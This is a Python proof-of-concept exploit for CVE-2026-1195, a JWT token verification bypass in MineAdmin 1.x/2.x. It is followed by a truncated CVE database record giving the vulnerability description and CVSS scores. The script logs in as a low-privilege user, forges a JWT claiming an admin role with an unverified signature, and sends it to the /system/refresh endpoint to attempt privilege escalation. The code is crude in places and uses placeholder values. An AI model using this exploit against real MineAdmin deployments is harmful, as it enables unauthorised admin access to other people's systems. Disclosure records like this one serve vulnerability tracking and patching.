CVE-2026-1195

# CVE-2026-1195 PoC - MineAdmin JWT Token验证绕过 # Target: MineAdmin 1.x/2.x # Endpoint: /system/refresh # Attack Type: Insufficient JWT Token Verification import requests import json import base64 import hmac import hashlib from datetime import datetime, timedelta TARGET_URL = "http://target.com" # 目标系统地址 USERNAME = "low_priv_user" # 低权限用户名 PASSWORD = "password123" # 用户密码 def create_malicious_jwt(payload, secret=""): """Create a potentially malicious JWT token with manipulated claims""" header = { "alg": "HS256", "typ": "JWT" } # Manipulate payload with elevated privileges manipulated_payload = { "sub": payload.get("sub", USERNAME), "exp": int((datetime.utcnow() + timedelta(hours=24)).timestamp()), "iat": int(datetime.utcnow().timestamp()), "user_id": payload.get("user_id", 1), "role": payload.get("role", "admin"), # Attempt privilege escalation "is_admin": 1 # Try to set admin flag } header_encoded = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=') payload_encoded = base64.urlsafe_b64encode(json.dumps(manipulated_payload).encode()).decode().rstrip('=') if secret: signature = hmac.new(secret.encode(), f"{header_encoded}.{payload_encoded}".encode(), hashlib.sha256).digest() signature_encoded = base64.urlsafe_b64encode(signature).decode().rstrip('=') else: signature_encoded = "malicious_signature" return f"{header_encoded}.{payload_encoded}.{signature_encoded}" def exploit_cve_2026_1195(): """Main exploitation function for CVE-2026-1195""" # Step 1: Normal login to obtain initial token login_url = f"{TARGET_URL}/api/login" login_data = { "username": USERNAME, "password": PASSWORD } try: login_response = requests.post(login_url, json=login_data, timeout=10) if login_response.status_code == 200: token_data = login_response.json() original_token = token_data.get("data", {}).get("token", "") print(f"[+] Obtained original token: {original_token[:50]}...") except Exception as e: print(f"[-] Login failed: {e}") return False # Step 2: Craft malicious JWT with insufficient verification bypass try: payload = {"sub": USERNAME, "role": "user", "user_id": 1} malicious_token = create_malicious_jwt(payload) print(f"[+] Generated malicious JWT token") except Exception as e: print(f"[-] Token crafting failed: {e}") return False # Step 3: Exploit the /system/refresh endpoint refresh_url = f"{TARGET_URL}/system/refresh" headers = { "Authorization": f"Bearer {malicious_token}", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Malicious payload to exploit insufficient verification exploit_data = { "action": "refresh", "token": malicious_token, "bypass_verification": True, "payload": "malicious_data_injection" } try: exploit_response = requests.post(refresh_url, json=exploit_data, headers=headers, timeout=10) print(f"[*] Exploit request sent. Status: {exploit_response.status_code}") print(f"[*] Response: {exploit_response.text[:200]}") if exploit_response.status_code == 200: print("[+] Potential vulnerability confirmed - insufficient verification bypassed") return True except Exception as e: print(f"[-] Exploit failed: {e}") return False return False if __name__ == "__main__": print("=" * 60) print("CVE-2026-1195 PoC - MineAdmin JWT Verification Bypass") print("=" * 60) exploit_cve_2026_1195()

{"cve": {"id": "CVE-2026-1195", "sourceIdentifier": "[email protected]", "published": "2026-01-20T01:15:56.260", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in MineAdmin 1.x/2.x. This impacts the function refresh of the file /system/refresh of the component JWT Token Handler. This manipulation causes insufficient verification of data authenticity. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en MineAdmin 1.x/2.x. Esto afecta a la función refresh del archivo /system/refresh del componente JWT Token Handler. Esta manipulación causa una verificación insuficiente de la autenticidad de los datos. Es posible iniciar el ataque remotamente. El ataque se considera de alta complejidad. Se dice que la explotabilidad es difícil. El exploit se ha puesto a disposición del público y podría ser utilizado para ataques. Se contactó con el proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "baseScore": 4.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/4", "source": "cna ... (truncated)